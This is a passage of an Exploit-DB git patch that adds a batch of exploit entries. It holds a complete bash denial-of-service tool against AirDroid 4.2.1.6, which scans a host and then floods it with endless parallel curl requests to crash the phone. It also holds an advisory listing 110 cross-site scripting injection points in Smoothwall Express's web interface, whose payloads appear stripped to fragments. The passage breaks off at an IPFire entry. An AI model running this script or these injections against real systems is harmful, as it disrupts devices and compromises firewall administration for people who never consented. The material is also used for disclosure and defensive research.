From d622832ea074443732f02a4f99a717cc22cd4400 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 12 Feb 2019 05:01:49 +0000 Subject: [PATCH] DB: 2019-02-12 21 changes to exploits/shellcodes KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH) Jzip - Buffer Overflow (Denial of Service) (SEH Unicode) Jzip - Buffer Overflow (PoC) (SEH Unicode) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC) STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite) Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service) Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH) Netatalk 3.1.12 - Authentication Bypass (PoC) IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) IP-Tools 2.50 - Local Buffer Overflow (PoC) Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite) FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC) FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite) Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC) Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite) AirDroid 4.2.1.6 - Denial of Service FutureDj Pro 1.7.2.0 - Denial of Service NordVPN 6.19.6 - Denial of Service (PoC) River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH) IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH) Evince - CBT File Command Injection (Metasploit) Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure Netatalk - Bypass Authentication Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit) NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) Indusoft Web Studio 8.1 SP2 - Remote Code Execution Smoothwall Express 3.1-SP4 - Cross-Site Scripting Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset IPFire 2.21 - Cross-Site Scripting MyBB Bans List 1.0 - Cross-Site Scripting VA MAX 8.3.4 - Authenticated Remote Code Execution CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting Webiness Inventory 2.3 - 'email' SQL Injection --- exploits/android/dos/46337.sh | 95 + exploits/cgi/webapps/46333.txt | 1780 +++++++++++++ exploits/cgi/webapps/46344.txt | 2649 ++++++++++++++++++++ exploits/hardware/webapps/46336.html | 35 + exploits/linux/local/46341.rb | 108 + exploits/linux/webapps/46349.txt | 20 + exploits/multiple/{remote => dos}/46048.py | 0 exploits/multiple/remote/46342.py | 136 + exploits/osx/remote/46339.rb | 127 + exploits/php/remote/46340.rb | 87 + exploits/php/webapps/46347.txt | 23 + exploits/php/webapps/46348.py | 99 + exploits/php/webapps/46350.txt | 46 + exploits/windows/dos/46338.py | 32 + exploits/windows/dos/46343.py | 22 + exploits/windows/dos/46346.py | 44 + exploits/windows/local/46334.py | 119 + exploits/windows/local/46335.py | 67 + exploits/windows/local/46345.py | 49 + files_exploits.csv | 40 +- 20 files changed, 5567 insertions(+), 11 deletions(-) create mode 100755 exploits/android/dos/46337.sh create mode 100644 exploits/cgi/webapps/46333.txt create mode 100644 exploits/cgi/webapps/46344.txt create mode 100644 exploits/hardware/webapps/46336.html create mode 100755 exploits/linux/local/46341.rb create mode 100644 exploits/linux/webapps/46349.txt rename exploits/multiple/{remote => dos}/46048.py (100%) create mode 100755 exploits/multiple/remote/46342.py create mode 100755 exploits/osx/remote/46339.rb create mode 100755 exploits/php/remote/46340.rb create mode 100644 exploits/php/webapps/46347.txt create mode 100755 exploits/php/webapps/46348.py create mode 100644 exploits/php/webapps/46350.txt create mode 100755 exploits/windows/dos/46338.py create mode 100755 exploits/windows/dos/46343.py create mode 100755 exploits/windows/dos/46346.py create mode 100755 exploits/windows/local/46334.py create mode 100755 exploits/windows/local/46335.py create mode 100755 exploits/windows/local/46345.py diff --git a/exploits/android/dos/46337.sh b/exploits/android/dos/46337.sh new file mode 100755 index 000000000..744d5b8d4 --- /dev/null +++ b/exploits/android/dos/46337.sh @@ -0,0 +1,95 @@ +#!/bin/bash + +# ***************************************************** +# * Author: Marcelo Vázquez (aka s4vitar) * +# * AirDroid Denial of Service (DoS) & System Crash * +# ***************************************************** + +# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash +# Date: 2019-02-07 +# Exploit Author: Marcelo Vázquez +# Vendor Homepage: https://web.airdroid.com/ +# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en +# Version: AirDroid 4.2.1.6 +# Tested on: Android + +#Colours +greenColour="\e[0;32m\033[1m" +endColour="\033[0m\e[0m" +redColour="\e[0;31m\033[1m" +blueColour="\e[0;34m\033[1m" +yellowColour="\e[0;33m\033[1m" +purpleColour="\e[0;35m\033[1m" +turquoiseColour="\e[0;36m\033[1m" +grayColour="\e[0;37m\033[1m" + +trap ctrl_c INT + +function ctrl_c() { + echo -e "\n\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour}Exiting...${endColour}\n" && tput cnorm + pkill curl > /dev/null 2>&1 + exit +} + +function check_host(){ + # Target availability detection + echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking host availability...${endColour}" && sleep 1 + + ping -c 1 $host > /dev/null 2>&1 + + if [ "$(echo $?)" == "0" ]; then + echo -e "\n\t${greenColour}--${endColour}${redColour} Host is active${endColour}${greenColour} --${endColour}\n" + else + echo -e "\n\t${greenColour}--${endColour}${redColour} Host is inactive${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit + fi + + echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking if port is open...${endColour}" && sleep 1 + + if [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ] && [ "$(nmap -p$port $host -sC -sV | grep -i airdroid)" ]; then + echo -e "\n\t${greenColour}--${endColour}${redColour} Port${endColour}${grayColour} $port${endColour}${redColour} is open!!${endColour}${greenColour} --${endColour}\n" + echo -e "\t${greenColour}--${endColour}${redColour} ${endColour}${turquoiseColour}Airdroid Service${endColour}${redColour} detected !!${endColour}${greenColour} --${endColour}\n" + elif [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ]; then + echo -e "\n\t${greenColour}--${endColour}${redColour} Port is open but it does not correspond to the ${endColour}${turquoiseColour}Airdroid service${endColour}${redColour}!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit + else + echo -e "\n\t${greenColour}--${endColour}${redColour} Port is closed!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit + fi +} + +function banner() +{ + sleep 0.2 && echo -e "\n$redColour /\ $endColour" + sleep 0.2 && echo -e "$redColour / \ $endColour" + sleep 0.2 && echo -e "$redColour | | $endColour $yellowColour[${endColour}${grayColour}AirDroid Denial of Service (DoS) [System Crash]${endColour}${yellowColour}]${endColour}" + sleep 0.2 && echo -e "$redColour | | $endColour ${yellowColour}Author:${endColour}${grayColour} Marcelo Vázquez (aka s4vitar)${endColour}" + sleep 0.2 && echo -e "$redColour / == \ $endColour" + sleep 0.2 && echo -e "$redColour |/**\| $endColour" + sleep 0.2 && for i in $(seq 1 70); do echo -ne "${redColour}-${endColour}"; done && sleep 1 && echo +} + +if [ "$(echo $#)" == "2" ]; then + tput civis && banner + host=$1 && port=$2 + echo && check_host + + # Path to launch the message box on the mobile device + url="http://$host:$port/sdctl/comm/lite_auth/" + + tput cnorm && echo -ne "${yellowColour}You want to start the attack?${endColour}${grayColour} <${endColour}${redColour}y${endColour}${turquoiseColour}/${endColour}${blueColour}n${endColour}${grayColour}>${endColour}${grayColour}:${endColour} " && read attack_response + + if [ "$(echo $attack_response)" == "y" ]; then + counter=0 + + # Start launch attack of the message boxes, so the Application crash and the device freezes + tput civis && while true; do + for i in $(seq 1 3000); do + curl --silent "$url" & + let counter+=1 + done && wait + echo -e "\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${redColour} $counter${endColour}${grayColour} requests successfully sent${endColour}${redColour}!!${endColour}" + done + else + : + fi +else + echo -e "\n${blueColour}Usage: ${endColour}${redColour}./airdroid_dos.sh ${endColour}${yellowColour}<${endColour}${grayColour}ip_address${endColour}${yellowColour}>${endColour}${yellowColour} <${endColour}${grayColour}port${endColour}${yellowColour}>${endColour}\n" +fi \ No newline at end of file diff --git a/exploits/cgi/webapps/46333.txt b/exploits/cgi/webapps/46333.txt new file mode 100644 index 000000000..16e80da50 --- /dev/null +++ b/exploits/cgi/webapps/46333.txt @@ -0,0 +1,1780 @@ +################################################################################################################################## +# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 | +Cross-Site Scripting +# Date: 06.02.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: http://www.smoothwall.org +# Software Link: +https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download +# Version: 3.1-SP4-polar-x86_64-update9 +################################################################################################################################## + +Introduction +The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface. + + +################################################################################# + +XSS details: Reflected & Stored + +################################################################################# + +XSS1 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +CACHE_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS2 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MAX_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS3 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MIN_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS4 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MAX_OUTGOING_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS5 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MAX_INCOMING_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS6 | Stored + +URL +http://192.168.2.200:81/cgi-bin/urlfilter.cgi + +METHOD +Post + +PARAMETER +REDIRECT_PAGE + +PAYLOAD +'> + +################################################################################# + +XSS7 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/urlfilter.cgi + +METHOD +Post + +PARAMETER +CHILDREN + +PAYLOAD +'> + +################################################################################# + +XSS8 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +BOOT_SERVER + +PAYLOAD +'> + +################################################################################# + +XSS9 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +BOOT_FILE + +PAYLOAD +'> + +################################################################################# + +XSS10 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +BOOT_ROOT + +PAYLOAD +'> + +################################################################################# + +XSS11 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +START_ADDR + +PAYLOAD +'> + +################################################################################# + +XSS12 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +END_ADDR + +PAYLOAD +'> + +################################################################################# + +XSS13 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DNS1 + +PAYLOAD +'> + +################################################################################# + +XSS14 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DNS2 + +PAYLOAD +'> + +################################################################################# + +XSS15 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NTP1 + +PAYLOAD +'> + +################################################################################# + +XSS16 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NTP2 + +PAYLOAD +'> + +################################################################################# + +XSS17 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +WINS1 + +PAYLOAD +'> + +################################################################################# + +XSS18 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +WINS2 + +PAYLOAD +'> + +################################################################################# + +XSS19 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DEFAULT_LEASE_TIME + +PAYLOAD +'> + +################################################################################# + +XSS20 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +MAX_LEASE_TIME + +PAYLOAD +'> + +################################################################################# + +XSS21 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DOMAIN_NAME + +PAYLOAD +'> + +################################################################################# + +XSS22 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NIS_DOMAIN + +PAYLOAD +'> + +################################################################################# + +XSS23 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NIS1 + +PAYLOAD +'> + +################################################################################# + +XSS24 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NIS2 + +PAYLOAD +'> + +################################################################################# + +XSS25 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_HOST + +PAYLOAD +'> + +################################################################################# + +XSS26 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_DESC + +PAYLOAD +'> + +################################################################################# + +XSS27 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_MAC + +PAYLOAD +'> + +################################################################################# + +XSS28 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_IP + +PAYLOAD +'> + +################################################################################# + +XSS29 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS30 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +DOMAIN + +PAYLOAD +'> + +################################################################################# + +XSS31 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +LOGIN + +PAYLOAD +'"> + +################################################################################# + +XSS32 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +PASSWORD + +PAYLOAD +'> + +################################################################################# + +XSS33 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS34 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/hosts.cgi? + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'"> + +################################################################################# + +XSS35 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/hosts.cgi? + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS36 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/hosts.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS37 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/time.cgi? + +METHOD +Post + +PARAMETER +NTP_SERVER + +PAYLOAD +'> + +################################################################################# + +XSS38 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +BATTLEVEL + +PAYLOAD +'> + +################################################################################# + +XSS39 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +RTMIN + +PAYLOAD +'> + +################################################################################# + +XSS40 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +BATTDELAY + +PAYLOAD +'> + +################################################################################# + +XSS41 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +TO + +PAYLOAD +'> + +################################################################################# + +XSS42 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +ANNOY + +PAYLOAD +'> + +################################################################################# + +XSS43 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSIP + +PAYLOAD +'> + +################################################################################# + +XSS44 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSNAME + +PAYLOAD +'> + +################################################################################# + +XSS45 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSPORT + +PAYLOAD +'> + +################################################################################# + +XSS46 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +POLLTIME + +PAYLOAD +'> + +################################################################################# + +XSS47 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSUSER + +PAYLOAD +'> + +################################################################################# + +XSS48 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +NISPORT + +PAYLOAD +'> + +################################################################################# + +XSS49 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSAUTH + +PAYLOAD +'> + +################################################################################# + +XSS50 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +EMAIL + +PAYLOAD +'> + +################################################################################# + +XSS51 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +FROM + +PAYLOAD +'> + +################################################################################# + +XSS52 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +CC + +PAYLOAD +'> + +################################################################################# + +XSS53 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +SMSEMAIL + +PAYLOAD +'> + +################################################################################# + +XSS54 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +SMTPSERVER + +PAYLOAD +'> + +################################################################################# + +XSS55 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +PORT + +PAYLOAD +'> + +################################################################################# + +XSS56 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +USER + +PAYLOAD +'> + +################################################################################# + +XSS57 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +EMAIL_PASSWORD + +PAYLOAD +'"> + +################################################################################# + +XSS58 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +EXT + +PAYLOAD +'> + +################################################################################# + +XSS59 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +SRC_PORT_SEL + +PAYLOAD +'> + +################################################################################# + +XSS60 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +SRC_PORT + +PAYLOAD +'> + +################################################################################# + +XSS61 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +DEST_IP + +PAYLOAD +'> + +################################################################################# + +XSS62 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +DEST_PORT_SEL + +PAYLOAD +'> + +################################################################################# + +XSS63 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS64 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/outgoing.cgi? + +METHOD +Post + +PARAMETER +MACHINE + +PAYLOAD +'> + +################################################################################# + +XSS65 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/outgoing.cgi? + +METHOD +Post + +PARAMETER +MACHINECOMMENT + +PAYLOAD +'> + +################################################################################# + +XSS66 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dmzholes.cgi? + +METHOD +Post + +PARAMETER +SRC_IP + +PAYLOAD +'> + +################################################################################# + +XSS67 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dmzholes.cgi? + +METHOD +Post + +PARAMETER +DEST_IP + +PAYLOAD +'> + +################################################################################# + +XSS68 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dmzholes.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS69 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/xtaccess.cgi? + +METHOD +Post + +PARAMETER +EXT + +PAYLOAD +'> + +################################################################################# + +XSS70 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/xtaccess.cgi? + +METHOD +Post + +PARAMETER +DEST_PORT + +PAYLOAD +'> + +################################################################################# + +XSS71 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/xtaccess.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS72 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ipblock.cgi? + +METHOD +Post + +PARAMETER +SRC_IP + +PAYLOAD +'> + +################################################################################# + +XSS73 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ipblock.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS74 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/timedaccess.cgi? + +METHOD +Post + +PARAMETER +MACHINES + +PAYLOAD +'> + +################################################################################# + +XSS75 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +GREEN_ADDRESS + +PAYLOAD +'> + +################################################################################# + +XSS76 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +GREEN_NETMASK + +PAYLOAD +'> + +################################################################################# + +XSS77 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_DHCP_HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS78 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_ADDRESS + +PAYLOAD +'> + +################################################################################# + +XSS79 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS1_OVERRIDE + +PAYLOAD +'> + +################################################################################# + +XSS80 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS2_OVERRIDE + +PAYLOAD +'> + +################################################################################# + +XSS81 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_MAC + +PAYLOAD +'> + +################################################################################# + +XSS82 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_NETMASK + +PAYLOAD +'> + +################################################################################# + +XSS83 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DEFAULT_GATEWAY + +PAYLOAD +'> + +################################################################################# + +XSS84 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS1 + +PAYLOAD +'> + +################################################################################# + +XSS85 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS2 + +PAYLOAD +'> + +################################################################################# + +XSS86 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +NAME + +PAYLOAD +'> + +################################################################################# + +XSS87 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +LEFT + +PAYLOAD +'> + +################################################################################# + +XSS88 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +LEFT_SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS89 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +RIGHT + +PAYLOAD +'> + +################################################################################# + +XSS90 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +RIGHT_SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS91 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +SECRET1 + +PAYLOAD +'> + +################################################################################# + +XSS92 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +SECRET2 + +PAYLOAD +'> + +################################################################################# + +XSS93 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS94 | Stored + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +filename + +PAYLOAD + + +################################################################################# + +XSS95 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat + +METHOD +Post + +PARAMETER +SOURCE_IP + +PAYLOAD +"> + +################################################################################# + +XSS96 | Stored + +URL +http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat + +METHOD +Post + +PARAMETER +FILTER + +PAYLOAD +'> + +################################################################################# + +XSS97 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ipinfo.cgi? + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS98 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/iptools.cgi? + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS99 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? + +METHOD +Post + +PARAMETER +WRAP + +PAYLOAD +'> + +################################################################################# + +XSS100 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? + +METHOD +Post + +PARAMETER +SECTIONTITLE + +PAYLOAD +'> + +################################################################################# + +XSS101 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +INIT + +PAYLOAD +'> + +################################################################################# + +XSS102 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +HANGUP + +PAYLOAD +'> + +################################################################################# + +XSS103 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +SPEAKER_ON + +PAYLOAD +'> + +################################################################################# + +XSS104 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +SPEAKER_OFF + +PAYLOAD +'> + +################################################################################# + +XSS105 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +TONE_DIAL + +PAYLOAD +'> + +################################################################################# + +XSS106 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +PULSE_DIAL + +PAYLOAD +'> + +################################################################################# + +XSS107 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +TIMEOUT + +PAYLOAD +'> + +################################################################################# + +XSS108 | Stored + +URL +http://192.168.2.200:81/cgi-bin/preferences.cgi? + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS109 | Stored + +URL +http://192.168.2.200:81/cgi-bin/preferences.cgi? + +METHOD +Post + +PARAMETER +KEYMAP + +PAYLOAD +'> + +################################################################################# + +XSS110 | Stored + +URL +http://192.168.2.200:81/cgi-bin/preferences.cgi? + +METHOD +Post + +PARAMETER +OPENNESS + +PAYLOAD +'> + +################################################################################# \ No newline at end of file diff --git a/exploits/cgi/webapps/46344.txt b/exploits/cgi/webapps/46344.txt new file mode 100644 index 000000000..a38d11742 --- /dev/null +++ b/exploits/cgi/webapps/46344.txt @@ -0,0 +1,2649 @@ +################################################################################################################################## +# Exploit Title: IPFire 2.21 - Core Update 